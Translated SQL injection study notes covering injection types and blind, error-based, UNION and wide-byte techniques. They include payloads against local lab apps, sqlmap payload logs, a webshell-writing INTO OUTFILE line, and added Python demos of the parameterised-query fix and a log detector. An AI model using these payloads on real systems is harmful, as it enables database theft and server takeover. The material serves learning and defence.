# SQL Injection Learning Summary

Tasks for this stage

1. Collect the various payloads used for SQL injection from around the web and understand the situation each one applies to (detecting an injection, exploiting an injection).

2. Record the payloads sqlmap uses during detection and exploitation (this is another way of collecting payloads).

3. Understand the meaning of the SQL statements involved. They span different databases and different injection scenarios; the learning process and the collected material can be organized into a report. Understanding the payloads builds on the basics studied earlier.

Study approach


SQL injection classification

Vulnerability principle

When the server interacts with the database, it builds SQL statements by string concatenation and does not strictly filter the parameters submitted by the user. A user can therefore insert SQL into a controllable parameter and change the semantic structure of the original statement, so that the database produces the result the attacker intends.

Impact of the vulnerability

  1. Attackers can access the data in the database without authorization, stealing users' private and personal information and causing a data leak.

  2. Web pages can be tampered with by manipulating the database.

  3. Field values in the database can be modified to embed links to web malware (a drive-by "hanging horse" attack); attackers can then deface pages and publish illegal content.

  4. The server can be remotely controlled and a backdoor installed; data can be added to or deleted from the database, for example adding or removing administrator accounts.

  5. The database is operated on maliciously: the database server is attacked and the database administrator account is tampered with.

  6. Data on disk is destroyed, paralysing the whole system.

Vulnerability classification

Injection type

Numeric type

When the input parameter is an integer and an injection exists, it can be regarded as a numeric injection.

Example:

(1) Append a single quote. URL: www.text.com/text.php?id=3'

Resulting SQL: select * from table where id=3'  The statement is malformed, the program cannot query the database normally, and an exception is thrown.

(2) Append and 1=1. URL: www.text.com/text.php?id=3 and 1=1

Resulting SQL: select * from table where id=3 and 1=1  The statement executes normally and the page shows no difference from the original.

(3) Append and 1=2. URL: www.text.com/text.php?id=3 and 1=2

Resulting SQL: select * from table where id=3 and 1=2  The statement executes normally but returns no rows, so the returned data differs from the original page.

If all three observations hold, the URL can be judged to have a numeric injection.

String type

When the input parameter is a string, the injection is called string-type. The biggest difference between string and numeric types is that a numeric parameter needs no single quote to close it, while a string generally has to be closed with a single quote.

For example, a numeric statement:

select * from table where id =3

The string version is:

select * from table where name='admin'

So when constructing a payload, closing the single quote lets the statement execute:

Test steps:

(1) Append a single quote:

select * from table where name='admin''

After the extra quote there are three single quotes, so the statement cannot execute and the program reports an error.

(2) Append ' and 1=1. The SQL statement is now:

select * from table where name='admin' and 1=1'

Injection still does not work here; the trailing quote has to be bypassed with a comment marker.

MySQL has three commonly used comment markers:

-- (note that this marker needs a space after it)

# comments out the rest of the line

/* */ comments out everything between the markers

So the constructed statement is:

select * from table where name ='admin' and 1=1-- 

which executes successfully and returns the correct result.

(3) Append and 1=2-- . The SQL statement is now:

select * from table where name='admin' and 1=2 -- 

which then reports an error.

If all three hold, the URL can be judged to have a string-type injection.
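As an added illustration (not from the original notes), the following Python script runs the three-step numeric and string checks described above against an in-memory SQLite table that stands in for the notes' `table`, and shows that the same probes stop working once the parameter is bound instead of concatenated. The table name `t`, its columns and the row data are assumptions; SQLite accepts the same quote and `-- ` comment syntax as the MySQL examples.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the notes' `table`: two rows, columns id and name (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table t (id integer, name text)")
    conn.executemany("insert into t values (?, ?)", [(3, "admin"), (4, "guest")])
    return conn


def run_concat(conn, value, numeric):
    """The vulnerable pattern from the notes: the parameter is pasted into the SQL text."""
    sql = (f"select * from t where id={value}" if numeric
           else f"select * from t where name='{value}'")
    try:
        return len(conn.execute(sql).fetchall())
    except sqlite3.OperationalError:
        return "error"          # malformed statement, e.g. an unterminated quote


def run_param(conn, value, numeric):
    """The fix: the parameter is bound, so it can never alter the statement's structure."""
    sql = "select * from t where id=?" if numeric else "select * from t where name=?"
    return len(conn.execute(sql, (value,)).fetchall())


def probes(base, numeric):
    """The three inputs the notes describe for numeric and for string parameters."""
    if numeric:
        return [f"{base}'", f"{base} and 1=1", f"{base} and 1=2"]
    return [f"{base}'", f"{base}' and 1=1-- ", f"{base}' and 1=2-- "]


def outcomes(conn, base, numeric, use_param):
    """Row count (or 'error') for each of the three probes."""
    run = run_param if use_param else run_concat
    return [run(conn, p, numeric) for p in probes(base, numeric)]


def looks_injectable(result):
    """The notes' decision rule: quote -> error, and 1=1 -> rows, and 1=2 -> no rows."""
    err, true_case, false_case = result
    return err == "error" and true_case not in ("error", 0) and false_case == 0


def demo():
    """Apply the rule to the concatenated and the parameterised query for both types."""
    conn = make_db()
    report = {}
    for label, base, numeric in [("numeric", "3", True), ("string", "admin", False)]:
        report[label + "/concat"] = looks_injectable(outcomes(conn, base, numeric, False))
        report[label + "/param"] = looks_injectable(outcomes(conn, base, numeric, True))
    return report


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16s} injectable={v}")
```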

Search type

To help users find resources, many sites offer a search function. Precisely because it is "only" search, programmers often forget to filter its variables (parameters) when writing the code, and this kind of flaw is widespread in domestic systems.

It is further divided into POST and GET: GET is generally used for on-site search, while POST is used for things like username login; the form's method attribute (method="get") tells you whether it is GET or POST. Search-type injection is also called text-box injection.

Principle:

$sql="select * from user where password like '%$pwd%' order by password";

This SQL finds the matching password in the users table based on the user-supplied pwd; a normal user would of course type something like admin or ckse. But what if someone enters this?

'and 1=1 and '%'='

The SQL statement then becomes:

select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

How to detect search-type injection:

Search for keywords' ; if that errors, there is a 90% chance of a flaw.

Search for keywords% ; if that also errors, there is a 95% chance of a flaw.

Search for keywords% 'and 1=1 and '%'=' (this statement plays the role of and 1=1 in ordinary SQL injection) and observe the response.

Search for keywords% 'and 1=2 and '%'=' (this statement plays the role of and 1=2 in ordinary SQL injection) and observe the response.

Compare the two responses to decide whether the search box is injectable.

Common statements:

'and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='

Submission method

GET

GET request parameters are placed in the URL. The parameters in a GET URL have a length limit, and Chinese characters need …

GET requests cover numeric, string and search injection.

Example: (request screenshots from the original notes are not reproduced)

POST

POST request parameters are placed in the request body and have no length limit.

Cookie parameters are placed in the request headers; the server reads them from the headers when the request is submitted.

HTTP headers

Values placed in HTTP headers, such as User-Agent, Host and Referer.

For example, a login form: after a successful login the application records the HTTP header information (screenshots not reproduced), so those header fields can be tested for injection.

Ways of extracting information

Boolean-based blind injection

Boolean-based blind injection shows itself as:

  1. No error messages
  2. Whether the input is correct or not, only two kinds of response are shown (true or false)
  3. With a correct input, appending and 1=1 / and 1=2 shows that conditions can be tested

Entering vince' and 1=2 #' shows that the system has SQL injection.

vince' and substr(database(),1,1)='p' #

Tests whether the first letter of the database name is p: if so, the page says the username exists, otherwise that it does not. Repeating this reveals the name one letter at a time.

Time-based blind injection

Time-based blind injection resembles boolean blind injection; when a boolean test is not possible, the condition after and can be tied to the response time instead, which gives time-based blind injection.

Sleep for 5 seconds:

vince' and  sleep(5) #

If the first character is p the page takes five seconds to load; if not, it returns immediately.

vince' and if((substr(database(),1,1))='p',sleep(5),null) #


Error-based injection

Error-based information extraction: in MySQL, specific functions are used to provoke an error, and the information planted in the error message is read back. select/insert/update/delete can all use errors to extract information, as long as the back end does not suppress database error messages and outputs them to the front end when a syntax error occurs.

Three commonly used error-provoking functions:

updatexml(): MySQL's XPath function for querying and modifying XML document data

extractvalue(): MySQL's XPath function for querying XML document data

floor(): MySQL's rounding function

updatexml function

Constructed payload:

aaa' or updatexml(1,concat(0x7e,database()),0) or '


Back-end logic:

insert into member(username,pw,sex,phonenum,email,address) values('aaa' or updatexml(1,concat(0x7e,database()),0) or '',md5('s'),'s','s','s','s');

extractvalue function

extractvalue (XML_document, XPath_string);

extractvalue(): returns a string containing the queried value from the target XML.

First parameter: XML_document, a string naming the XML document object (called Doc in the documentation).

Second parameter: XPath_string, a string in XPath format.

concat: returns the string formed by joining its arguments.

ss' or extractvalue(1,concat(0x7e,database())) or '


Back-end logic:

update member set sex='test1',phonenum='ss' or extractvalue(1,concat(0x7e,database())) or '',address='s',email='s' where username='s';

floor function

select * from security.users where id=1  and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

count(*): counts rows (duplicates)

rand(): pseudo-random number

group by: groups rows, de-duplicating

floor(): rounds down

Constructed payload:

and  (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)

UNION query injection

Steps of a union query:
    Find the injection point and work out the closing character
    Determine the database type
    Guess the number of columns and find the display positions
    Obtain basic information (database name, database version, current database, etc.)

1' order by 2   determine the number of columns
s' union select 1,2 #'   find the echoed positions
union select 1,group_concat(schema_name) from information_schema.schemata--+   list databases
union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa'   list tables
union select 1,group_concat(column_name) from information_schema.columns where table_name='users'   list columns
union select 1,group_concat(user_id,user,password) from users   dump the table
union select 1,'<?php eval($_post[shell]); ?>' into outfile 'C:/xampp/htdocs/dvwa/testtest.php'   write a webshell

Stacked query injection (executes several statements at once)

In SQL the semicolon (;) marks the end of a statement. Stacked query injection ends one statement with a semicolon (or another terminator) and then builds the next one; a stacked injection can execute arbitrary statements.

Conditions for use

Stacked injection is usable only in limited situations: it may be restricted by the API, the database engine, or permissions, and works only when the database call supports executing several SQL statements at once. The mysqli_multi_query() function does support executing multiple statements together.

In practice, however, PHP code usually calls mysqli_query() as a defence against SQL injection; it executes only one statement, so anything after the semicolon is not executed.

Wide-byte injection

Wide-byte injection exploits a MySQL behaviour: when the connection uses GBK, MySQL treats two bytes as one Chinese character (the first byte must be above 128 to fall into the Chinese range). So %DF and the following backslash (%5c) are merged into one character, "运", and the quote "escapes" from the escaping.

Conditions for wide-byte injection

1. The database encoding is set to a GB-family charset,
	and the database connection also uses a GB-family charset.
2. An escaping function is used that filters the parameters passed by GET, POST and cookie, escaping sensitive characters such as single quotes, double quotes and NUL with the backslash \.
	Common functions are addslashes() and mysql_real_escape_string(); this escaping is what is usually called the "filtering mechanism".
	Only when both conditions hold does a wide-byte injection exist.

Constructed payload:

s%DF' or 1=1 #

Example:

Entering 1 returns the normal page; entering 1' shows that the quote is escaped (screenshots not reproduced).

Using the wide-byte construction above, id=1%df' or id=1%aa' triggers a database error (screenshot not reproduced).

From there it proceeds as ordinary error-based injection.
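Added example (not part of the original notes): a byte-level Python model of why the escaping in condition 2 fails under condition 1. `addslashes` here is a simplified stand-in for PHP's function and the input bytes are constructed; it shows that after escaping, 0xDF and the backslash 0x5C are consumed as one GBK character and the quote is left unescaped, while escaping after decoding in the server's charset (what a correctly configured mysqli_real_escape_string does) keeps the backslash in front of the quote.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # insert "\" before the sensitive byte
        out.append(b)
    return bytes(out)


def quote_still_escaped(text: str) -> bool:
    """True when every single quote in the decoded text is preceded by a backslash."""
    return all(i > 0 and text[i - 1] == "\\" for i, ch in enumerate(text) if ch == "'")


def escape_then_decode(raw: bytes, charset: str) -> dict:
    """The vulnerable order: escape the raw bytes, then let the server decode them as `charset`.
    Under GBK the pair DF 5C is one character, so the inserted backslash disappears."""
    escaped = addslashes(raw)
    decoded = escaped.decode(charset, errors="replace")
    return {"escaped_hex": escaped.hex(), "decoded": decoded,
            "safe": quote_still_escaped(decoded)}


def decode_then_escape(raw: bytes, charset: str) -> str:
    """The safe order: decode in the connection charset first, then escape per character.
    A lone 0xDF cannot pair with 0x27, so it becomes U+FFFD and the quote keeps its backslash."""
    text = raw.decode(charset, errors="replace")
    return "".join(("\\" + ch) if ch in "'\"\\\x00" else ch for ch in text)


# Constructed inputs: the notes' %DF' prefix, and an ordinary quoted value for comparison.
WIDE = b"\xdf'"
PLAIN = b"admin'"


def demo() -> dict:
    return {
        "gbk/escape-then-decode": escape_then_decode(WIDE, "gbk"),
        "utf8/escape-then-decode": escape_then_decode(WIDE, "utf-8"),
        "gbk/plain-input": escape_then_decode(PLAIN, "gbk"),
        "gbk/decode-then-escape": decode_then_escape(WIDE, "gbk"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```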

SQL injection payloads

Manual injection

Error-based injection

Usable for both string and numeric types:

union select 1,group_concat(schema_name) from information_schema.schemata--+
union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa'
union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
union select 1,group_concat(user_id,user,password) from users
union select 1,'<?php eval($_post[shell]); ?>' into outfile 'C:/xampp/htdocs/dvwa/testtest.php'

Boolean blind injection

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))=115 --+  number of databases

http://127.0.0.1/sqlilab/Less-5/?id=1' and length(database())='9'--+  database name length

http://127.0.0.1/sqlilab/Less-5/?id=1' and left((select database()),1)='a'--+  current database

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101--+  first table
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=101--+  second table

Columns:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68--+
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select password from security.users limit 0,1),1,1))=68--+

Time-based injection

Finding the injection point:
' and if(1=0,1, sleep(10)) --+ 
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+

Guessing the database name length:
if(*,*,*)
length(database())
true: sleep(10)   false: sleep(1)
if(length(database())=8,sleep(5),1)--+
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(length(database())=8,sleep(10),sleep(1))--+

Guessing the database name:
if(*,*,*)
length(database())
true: sleep(10)   false: sleep(1)
if(length(database())=8,sleep(5),1)--+
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(length(database())=8,sleep(10),sleep(1))--+

Listing all tables:
if(*,*,*)
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101--+
true: sleep(10)   false: sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101,sleep(10),sleep(1))--+

Finding column names:
if(*,*,*)
ascii(substr((select username from security.users limit 0,1),1,1))=68--+
true: sleep(10)   false: sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(10),sleep(1))--+

Guessing column data:
if(*,*,*)
ascii(substr((select username from security.users limit 0,1),1,1))=68--+
true: sleep(10)   false: sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(10),sleep(1))--+
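Added example, not from the original notes: a small Python detector that runs the payload patterns collected in the manual sections above (boolean tautologies, UNION and information_schema enumeration, sleep(), updatexml()/extractvalue()/floor(rand()), substr()/ascii() extraction, INTO OUTFILE, and the %DF wide-byte prefix) over web-server access-log lines. The log lines and the signature list are constructed here and the signatures need tuning per application.

```python
import re
from urllib.parse import unquote_to_bytes

# Signatures drawn from the payloads collected in these notes. Assumption: the application's
# legitimate parameters never carry these tokens; the list must be tuned per application.
SIGNATURES = {
    "boolean/tautology": re.compile(rb"\b(and|or)\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+", re.I),
    "union": re.compile(rb"union\s+(all\s+)?select", re.I),
    "schema-enum": re.compile(rb"information_schema\.(schemata|tables|columns)", re.I),
    "time-based": re.compile(rb"\b(sleep|benchmark)\s*\(", re.I),
    "error-based": re.compile(rb"\b(updatexml|extractvalue)\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "blind-extract": re.compile(rb"\b(substr|substring|ascii|left|length)\s*\(", re.I),
    "file-write": re.compile(rb"into\s+(out|dump)file", re.I),
    # A high byte right before a quote or backslash: the %DF' prefix of wide-byte injection.
    # Noisy on legitimately GBK-encoded text that happens to precede a quote.
    "wide-byte": re.compile(rb"[\x81-\xfe]['\"\\]"),
}

# Combined-format access log: client, timestamp, request line, status (assumption: this layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(path: str) -> bytes:
    """URL-decode to bytes (so %DF stays a raw 0xDF byte) and decode a second time
    to unwrap double-encoded payloads; '+' is treated as a space, as in --+."""
    raw = unquote_to_bytes(path.replace("+", " "))
    return unquote_to_bytes(raw)


def classify_request(path: str) -> list:
    """Names of every signature that matches the decoded request path, in table order."""
    raw = decode_path(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(raw)]


def scan(lines):
    """Return (ip, timestamp, status, tags) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits.append((m["ip"], m["ts"], m["status"], tags))
    return hits


# Constructed sample lines modelled on the sqli-labs / DVWA URLs used in the notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2022:09:44:41 +0800] "GET /sqlilab/Less-5/?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/Jun/2022:09:58:22 +0800] "GET /sqlilab/Less-9/?id=1%27%20and%20if(length(database())=8,sleep(10),sleep(1))--+ HTTP/1.1" 200 488',
    '10.0.0.9 - - [26/Jun/2022:09:58:40 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,group_concat(schema_name)%20from%20information_schema.schemata--+ HTTP/1.1" 200 1201',
    '10.0.0.9 - - [26/Jun/2022:10:15:24 +0800] "GET /sqlilab/Less-32/?id=1%df%27%20or%201=1%20%23 HTTP/1.1" 500 231',
    '10.0.0.12 - - [26/Jun/2022:10:20:01 +0800] "GET /search.php?q=admin HTTP/1.1" 200 330',
]

if __name__ == "__main__":
    for ip, ts, status, tags in scan(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} {', '.join(tags)}")
```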

Automated tool payloads

sqlmap

MySQL UNION-based

Command used:

python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vicne*&submit=%E6%9F%A5%E8%AF%A2" --dbms=mysql  --technique U  -v 3 --batch
[10:37:04] [PAYLOAD] vicne) ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne) ORDER BY 4031-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 1-- -
[10:37:05] [PAYLOAD] vicne ORDER BY 2608-- -
[10:37:05] [PAYLOAD] vicne') ORDER BY 1-- -
[10:37:06] [WARNING] reflective value(s) found and filtering out
[10:37:06] [PAYLOAD] vicne' ORDER BY 1-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 9194-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 10-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 6-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 4-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 3-- -
[10:37:06] [PAYLOAD] vicne' ORDER BY 2-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL UNION ALL SELECT CONCAT(0x716a766b71,0x786b4a646565686c436b72646842616f7066764e4753554f6d684145454161524d6f584f7078424d,0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,0x556342645972616b5166646e795963796d645872426f494b4954545649736e43626349687174524f,0x717a6a7a71),NULL FROM (SELECT 0 AS qUKp UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS AhsU-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (QUARTER(NULL) IS NULL) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (SESSION_USER() LIKE USER()) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,2952,NULL))) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- -
[10:37:06] [PAYLOAD] vicne' UNION ALL SELECT CONCAT(0x716a766b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a6a7a71),NULL-- 
MySQL error-based
[10:59:19] [PAYLOAD] 1212.(,",')..(
[10:59:20] [PAYLOAD] 1212'vTuXrl<'">mUNBgf
[10:59:20] [PAYLOAD] 1212) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VfiF
[10:59:21] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Cgfu
[10:59:21] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xwLe
[10:59:21] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- QAnl
[10:59:22] [PAYLOAD] 1212) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (8491=8491
[10:59:22] [PAYLOAD] 1212)) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((1509=1509
[10:59:23] [PAYLOAD] 1212))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (((2571=2571
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))
[10:59:23] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('GXgi'='GXgi
[10:59:23] [PAYLOAD] 1212')) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('CTtX'='CTtX
[10:59:23] [PAYLOAD] 1212'))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('eHPK'='eHPK
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xRub'='xRub
[10:59:23] [PAYLOAD] 1212') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('zHdf' LIKE 'zHdf
[10:59:23] [PAYLOAD] 1212')) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('qONo' LIKE 'qONo
[10:59:23] [PAYLOAD] 1212'))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('xuUi' LIKE 'xuUi
[10:59:23] [PAYLOAD] 1212%' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'klWR%'='klWR
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'TwBK' LIKE 'TwBK
[10:59:23] [PAYLOAD] 1212") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("nePS"="nePS
[10:59:23] [PAYLOAD] 1212")) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("jwWD"="jwWD
[10:59:23] [PAYLOAD] 1212"))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("ERiE"="ERiE
[10:59:23] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "Gesm"="Gesm
[10:59:23] [PAYLOAD] 1212") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("dMeC" LIKE "dMeC
[10:59:23] [PAYLOAD] 1212")) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("WWNr" LIKE "WWNr
[10:59:23] [PAYLOAD] 1212"))) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("yQdW" LIKE "yQdW
[10:59:23] [PAYLOAD] 1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "DlnV" LIKE "DlnV
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- fhgR
[10:59:23] [PAYLOAD] 1212 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))# yfhc
[10:59:23] [PAYLOAD] 1212' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) OR 'mysM'='CoPG
[10:59:23] [PAYLOAD] 1212') WHERE 7892=7892 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- gaJK
